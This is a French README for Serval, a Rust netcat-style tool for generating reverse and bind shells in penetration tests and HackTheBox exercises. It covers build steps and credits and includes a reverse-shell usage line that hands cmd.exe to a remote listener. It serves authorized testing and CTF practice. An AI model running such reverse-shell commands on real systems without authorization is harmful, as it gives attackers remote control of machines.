
Une backdoor de type Netcat pour les tests d'intrusion et les exercices de pentest.
Serval est un binaire léger et facile à utiliser pour générer des shells inversés et bind pour les pentests ou les exercices de pentesting. Serval est multiplateforme et peut être compilé pour Windows 32 et 64 bits ainsi que pour Linux 32 et 64 bits. Remarque : Grâce à la flexibilité de Rust, il est peut-être possible de compiler pour d'autres plateformes (comme ARM), mais je n'ai pas testé pour d'autres plateformes.
J'ai développé Serval pour supprimer ma dépendance à netcat lors des défis HacktheBox, car il peut être fastidieux de trouver des binaires netcat pour Windows (surtout avec l'option -e) et il est encore plus difficile d'en trouver un provenant d'une source fiable.
Téléchargez les sources depuis github
git clone https://github.com/tgadola/serval.git && cd serval-master
*Optionnel : Modifiez le fichier de construction dans .cargo/config pour réécrire votre chemin de construction.
Construisez le binaire pour votre plateforme actuelle.
cargo build --release
*Remarque : v1.1.0 nécessite Rust nightly
Vous pouvez construire pour d'autres plateformes en utilisant
cargo build --release --target <target-triple>
Si vous êtes une personne particulièrement confiante, vous pouvez télécharger les binaires pré-construits ici.
Par défaut, Serval écoute ou se connecte à un port et redirige l'entrée et la sortie standard vers cette connexion. Le drapeau -e lance un processus et redirige son entrée et sortie standard sur le réseau.
Serval écoute sur toutes les interfaces.
Utilisez le drapeau -H pour activer les fonctionnalités d'édition de ligne et d'historique des commandes !
serval -l 4400 -H
serval.exe <listening ip> <listening port> -q -e cmd.exe
Un grand merci à @kkawakam-transferwise et à leur crate Rustyline, qui fait littéralement tout le travail lourd. Découvrez Rustyline !
Merci aux créateurs et contributeurs de Clap ! Découvrez Clap.
Merci aux créateurs et contributeurs de Anyhow ! Découvrez Anyhow. +1 pour le super nom de crate.
Merci à @jaynus pour tous ses conseils sur Rust
Apache 2.0. Consultez le fichier de licence pour plus d'informations.